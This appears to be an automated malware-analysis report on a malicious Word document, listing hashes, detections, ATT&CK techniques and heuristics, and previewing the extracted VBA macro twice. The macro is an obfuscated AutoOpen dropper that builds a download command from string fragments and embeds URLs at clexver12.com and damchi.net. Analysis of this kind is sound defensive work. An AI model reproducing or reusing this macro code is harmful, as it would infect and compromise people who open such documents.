Office (OLE) malware analysis — malicious · b62230042f02ecdf

MALICIOUS

Office (OLE)

104.5 KB Created: 2018-02-08 07:34:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 8be00ff87450712164dcfcfcb601bcb6 SHA-1: 7468b8f82fdfb2f59b943aad7c4fe853d716cb8d SHA-256: b62230042f02ecdff4a53e7d3cb77023c1d4bdde332d568cfc2c1001500c314d

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' firing indicate that the VBA macro within this Office document is designed to execute arbitrary commands. The 'AutoOpen' macro is a common entry point for malicious VBA code, suggesting the intent is to download and run a second-stage payload upon opening the document. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports a malicious dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24918 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24918 bytes
SHA-256: `a20f8e103a6f18bf1ba7f40825f5511328ddd25a3d8cd2ca8c1d148917a3600b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NPbCwrUmVbRtzi" Sub AutoOpen() On Error Resume Next JZkdFcJzN = NjRTcwuSVUzsv - XFBiJfWDVpSY / (4510086 + JTWvTFjZvX - 7706686 + IDHkPQd) wFAabphRK = bBDZUIBwB - qCwJduFXSv / (7027427 + BuZTItuFlnZ - 2116249 + WkdnuFlNrn) vHrwjkKzO = BAJAAzIDvnD - npHJcjXqwMJ / (1344515 + MRwOVboKhSW - 5228340 + nvziSDkRUBp) Application.Run "ikRoLmOMGMZZwc", omwjibm XHabYfoqC = niLpZMPTFW - iwvcsQuFWMsP / (1397124 + NAMmCifYHzMls - 8542746 + UwOfEoJizfOul) fJvSEwLMC = DsFJqwPHYBOB - ikDCEVNGn / (6919715 + twEuhtjfSRKnwi - 3695023 + jYqsXduRiBwH) End Sub Function omwjibm() On Error Resume Next kwTVGBDr = ihEvWcXb - zmwdcAsKpFizDz / (8027511 + YUbSjTY - 3806082 + dnhokihndro) YwCLjI = wWTJJqBTNfk - szIvJPiNi / (9536317 + NLVFWwLZGAYazI - 1682040 + dXASzDSvma) fwrAPwajIRB = iNMbzAXGwoki - BGdNUWKnAq / (159953 + ifBJsZTwKhLtZ - 4901745 + aCKkstdQrZ) SiHdVNwSC = oacbzTBUjGz + Mid(("LzaojdGuzqpQscvCHRQd.c3hB+3hBox9H+x9HtpDfstzYlG"), 21, 17) hWAhtpvs = UVVwFORiLTuk - uzjlqFHzBOKko / (9580977 + fMEnhoE - 842897 + FEVbKRw) aCoziqaFjLV = pQjSjNnSEoTGKL - ROCzPGCAp / (8593560 + fljjmjSNvYQ - 6968212 + wQUdzlwuunENIS) ZVTFZsDpcQ = qmPqaCiCjXCk - zQtAdDAzlZAEu / (6791359 + wiTdRlXJIZKw - 3119025 + lFzAJzitE) cfthauLZm = bPQwdXM + Mid(("o ran3hB+3hBdom;c3hB+3hBZVYYU = .(WaHn3hB+3hBeWaDFX+DFXH+WaH3hB+3hBwWa3hB+'+'3hBH+3hB+3hBWaDFX+DFXH-ob'+'je3hB+3hBc3hBDFX+DFX+3hBt'+'WaH) Sy3x9H+x9H'+'hB+3hBsx9H+x9Htem3x9H+'+'x9HhB+3hB.NxbFnhcVKFwfdZt"), 2, 187) BYkwRiP = YTCZGla - GklAUCDklG / (918778 + jYzDTwsnid - 3550082 + fAZhHXXI) nrEFaOlj = PzhwDsNiuhr - fUATwGJsmpcRaV / (3698837 + VdOjwvUYSHP - 924985 + FjwbLzjZOIR) PiFrLdUiOd = PrZXPViYk - RTHCkAbB / (8372583 + FMhFfqPVmDHVz - 4288806 + EuBDlhfvsSdU) dNpnohXULD = FRhEMPmfTzDF + Mid(("VZQUWGwDKfjHsSDC 3hB+3hB= 3hB+DWiXZZFLWta"), 14, 17) KfZYh = UrYGNlhF - WlVfFZzFIZRonC / (4331525 + FGEuEWOi - 8926446 + KifUtOnWHin) vWzETcrQT = aZPKRikVhoCz - icKrzXql / (5998803 + TaofDBQvn - 3692610 + jfitEftZtW) ckWdMBwnW = fMOlcfHLzwv - wkdDhTQt / (2779597 + mwwjzurwMls - 8202821 + bQRYkobWWlUiJb) WUoUq = PjwNQaIC + Mid(("AuoCEvozGXjHQJqV3hB+3hB/3hB+3hlzQv"), 17, 14) AYjwB = TAmJSFpB - PvjEmKPNcznTQ / (6940108 + JOcvBzcb - 320406 + HVkcBcUZowK) kullSmDuQ = YbpKDMwvsDQfAE - tznnTidiofk / (5066438 + StcnwNqBGr - 9276024 + dGiEFEczz) KwcnzGjSZVc = aAJqRuwAfSm - czbdjmNbnIr / (4447242 + YuaiaIcVrTbdG - 9270552 + EFLddzdjdcVpkX) HQzCO = MFcdOzaQowi + Mid(("nhRwMrzMrphEXmmliwZYAaUB(3hB+3hBDFX+DFX10000Owlm"), 24, 21) hKmSKMLO = zzdqRXhwNtq - LzGETszEBSqGDv / (6638718 + GUTrsDdcswSAG - 4050706 + sIzoYLAqRJjijI) AJhCjnjPrzZ = mWotptazCI - dMUZzwjXz / (9505173 + HJcGdBh - 2259895 + zTVMwLMfBS) HnwkNiQMN = vjFhnVsM - zJLZjPfRjPYR / (8187457 + VJrIdmlBVinK - 5125882 + vTIJVcb) MFzsTmZO = RJmzsAWRFJJHk + Mid(("DB+3hB)3hBDFX+DFX+3hB, cZ3hB+3hBVSDC)wtMiJzRvEbAvdBuZTsfuESvKCtzEMI"), 2, 36) iiFtira = vMOazvnjlW - aVQHOwNHhAvdw / (1085693 + FjkvFdUYXvvvf - 6143900 + cJJsFZf) kLGESjvzJCs = fwrqCWzjSUG - DvqQLFztLTAib / (6224425 + mUDzQaEEzO - 7406338 + BXLcaYpzh) DzPnbntRn = shAcmSMvIP - wNPOUqPwqq / (239777 + mwVAqaJljq - 3537708 + WzoomsEFXzC) OuDMHCIHE = IvfhjvvlusEzj + Mid(("OuGjUMdB+3hBp:3hB+3h'+'B//clex9H+x9Hver12.com/E3hB+3hBcIF/?3hBx9DFX+DFX'+'H+xD'+'FX+DF'+'X9H+3hBh3hB+3hBttp3hB+3x9H+x9HhB:3hB+3hB//3hB+3hBdamchi.3hBDFX+DFX+3hBnet3hB+3hBtRKODrusSusSuBAChEQRbbz"), 8, 162) MnVPMj = INjQSVUzimHvo - VBbMwmvBptLEc / (3980221 + KkApjOlIXTW - 6813823 + sKuOHWk) mNSpci = wlsqwGXmEOtA - TBHFEdjtDs / (5374024 + pJfwzwG - 7018215 + LzIwnHNVSFdjj) ErBGAfb = InICsAovsQ - HzsoHRnPjHCzH / (3439221 + VXlnwTIjWL - 7854240 + NjFQGsLfKVhLnp) aBmMYpoj = vOFiawqd + Mid(("AthmkhB+3hBn(3hB+3'+'hBcZ3hB+3hBVa3hB+3x9H+x9HhBsf3hB+3hBc3hB+3hB'+'.3hB+3hBCv3hB'+'+'+'3hBnT3hB+3DFX+'+'DFXhBoSt3hB+3hBrSdx9H+x9H3hB+3hB83hB+3 ... (truncated)

SHA-256: a20f8e103a6f18bf1ba7f40825f5511328ddd25a3d8cd2ca8c1d148917a3600b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NPbCwrUmVbRtzi"
Sub AutoOpen()
On Error Resume Next
JZkdFcJzN = NjRTcwuSVUzsv - XFBiJfWDVpSY / (4510086 + JTWvTFjZvX - 7706686 + IDHkPQd)
wFAabphRK = bBDZUIBwB - qCwJduFXSv / (7027427 + BuZTItuFlnZ - 2116249 + WkdnuFlNrn)
vHrwjkKzO = BAJAAzIDvnD - npHJcjXqwMJ / (1344515 + MRwOVboKhSW - 5228340 + nvziSDkRUBp)
Application.Run "ikRoLmOMGMZZwc", omwjibm
XHabYfoqC = niLpZMPTFW - iwvcsQuFWMsP / (1397124 + NAMmCifYHzMls - 8542746 + UwOfEoJizfOul)
fJvSEwLMC = DsFJqwPHYBOB - ikDCEVNGn / (6919715 + twEuhtjfSRKnwi - 3695023 + jYqsXduRiBwH)
End Sub
Function omwjibm()
On Error Resume Next
kwTVGBDr = ihEvWcXb - zmwdcAsKpFizDz / (8027511 + YUbSjTY - 3806082 + dnhokihndro)
YwCLjI = wWTJJqBTNfk - szIvJPiNi / (9536317 + NLVFWwLZGAYazI - 1682040 + dXASzDSvma)
fwrAPwajIRB = iNMbzAXGwoki - BGdNUWKnAq / (159953 + ifBJsZTwKhLtZ - 4901745 + aCKkstdQrZ)
SiHdVNwSC = oacbzTBUjGz + Mid(("LzaojdGuzqpQscvCHRQd.c3hB+3hBox9H+x9HtpDfstzYlG"), 21, 17)
hWAhtpvs = UVVwFORiLTuk - uzjlqFHzBOKko / (9580977 + fMEnhoE - 842897 + FEVbKRw)
aCoziqaFjLV = pQjSjNnSEoTGKL - ROCzPGCAp / (8593560 + fljjmjSNvYQ - 6968212 + wQUdzlwuunENIS)
ZVTFZsDpcQ = qmPqaCiCjXCk - zQtAdDAzlZAEu / (6791359 + wiTdRlXJIZKw - 3119025 + lFzAJzitE)
cfthauLZm = bPQwdXM + Mid(("o ran3hB+3hBdom;c3hB+3hBZVYYU = .(WaHn3hB+3hBeWaDFX+DFXH+WaH3hB+3hBwWa3hB+'+'3hBH+3hB+3hBWaDFX+DFXH-ob'+'je3hB+3hBc3hBDFX+DFX+3hBt'+'WaH) Sy3x9H+x9H'+'hB+3hBsx9H+x9Htem3x9H+'+'x9HhB+3hB.NxbFnhcVKFwfdZt"), 2, 187)
BYkwRiP = YTCZGla - GklAUCDklG / (918778 + jYzDTwsnid - 3550082 + fAZhHXXI)
nrEFaOlj = PzhwDsNiuhr - fUATwGJsmpcRaV / (3698837 + VdOjwvUYSHP - 924985 + FjwbLzjZOIR)
PiFrLdUiOd = PrZXPViYk - RTHCkAbB / (8372583 + FMhFfqPVmDHVz - 4288806 + EuBDlhfvsSdU)
dNpnohXULD = FRhEMPmfTzDF + Mid(("VZQUWGwDKfjHsSDC 3hB+3hB= 3hB+DWiXZZFLWta"), 14, 17)
KfZYh = UrYGNlhF - WlVfFZzFIZRonC / (4331525 + FGEuEWOi - 8926446 + KifUtOnWHin)
vWzETcrQT = aZPKRikVhoCz - icKrzXql / (5998803 + TaofDBQvn - 3692610 + jfitEftZtW)
ckWdMBwnW = fMOlcfHLzwv - wkdDhTQt / (2779597 + mwwjzurwMls - 8202821 + bQRYkobWWlUiJb)
WUoUq = PjwNQaIC + Mid(("AuoCEvozGXjHQJqV3hB+3hB/3hB+3hlzQv"), 17, 14)
AYjwB = TAmJSFpB - PvjEmKPNcznTQ / (6940108 + JOcvBzcb - 320406 + HVkcBcUZowK)
kullSmDuQ = YbpKDMwvsDQfAE - tznnTidiofk / (5066438 + StcnwNqBGr - 9276024 + dGiEFEczz)
KwcnzGjSZVc = aAJqRuwAfSm - czbdjmNbnIr / (4447242 + YuaiaIcVrTbdG - 9270552 + EFLddzdjdcVpkX)
HQzCO = MFcdOzaQowi + Mid(("nhRwMrzMrphEXmmliwZYAaUB(3hB+3hBDFX+DFX10000Owlm"), 24, 21)
hKmSKMLO = zzdqRXhwNtq - LzGETszEBSqGDv / (6638718 + GUTrsDdcswSAG - 4050706 + sIzoYLAqRJjijI)
AJhCjnjPrzZ = mWotptazCI - dMUZzwjXz / (9505173 + HJcGdBh - 2259895 + zTVMwLMfBS)
HnwkNiQMN = vjFhnVsM - zJLZjPfRjPYR / (8187457 + VJrIdmlBVinK - 5125882 + vTIJVcb)
MFzsTmZO = RJmzsAWRFJJHk + Mid(("DB+3hB)3hBDFX+DFX+3hB, cZ3hB+3hBVSDC)wtMiJzRvEbAvdBuZTsfuESvKCtzEMI"), 2, 36)
iiFtira = vMOazvnjlW - aVQHOwNHhAvdw / (1085693 + FjkvFdUYXvvvf - 6143900 + cJJsFZf)
kLGESjvzJCs = fwrqCWzjSUG - DvqQLFztLTAib / (6224425 + mUDzQaEEzO - 7406338 + BXLcaYpzh)
DzPnbntRn = shAcmSMvIP - wNPOUqPwqq / (239777 + mwVAqaJljq - 3537708 + WzoomsEFXzC)
OuDMHCIHE = IvfhjvvlusEzj + Mid(("OuGjUMdB+3hBp:3hB+3h'+'B//clex9H+x9Hver12.com/E3hB+3hBcIF/?3hBx9DFX+DFX'+'H+xD'+'FX+DF'+'X9H+3hBh3hB+3hBttp3hB+3x9H+x9HhB:3hB+3hB//3hB+3hBdamchi.3hBDFX+DFX+3hBnet3hB+3hBtRKODrusSusSuBAChEQRbbz"), 8, 162)
MnVPMj = INjQSVUzimHvo - VBbMwmvBptLEc / (3980221 + KkApjOlIXTW - 6813823 + sKuOHWk)
mNSpci = wlsqwGXmEOtA - TBHFEdjtDs / (5374024 + pJfwzwG - 7018215 + LzIwnHNVSFdjj)
ErBGAfb = InICsAovsQ - HzsoHRnPjHCzH / (3439221 + VXlnwTIjWL - 7854240 + NjFQGsLfKVhLnp)
aBmMYpoj = vOFiawqd + Mid(("AthmkhB+3hBn(3hB+3'+'hBcZ3hB+3hBVa3hB+3x9H+x9HhBsf3hB+3hBc3hB+3hB'+'.3hB+3hBCv3hB'+'+'+'3hBnT3hB+3DFX+'+'DFXhBoSt3hB+3hBrSdx9H+x9H3hB+3hB83hB+3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.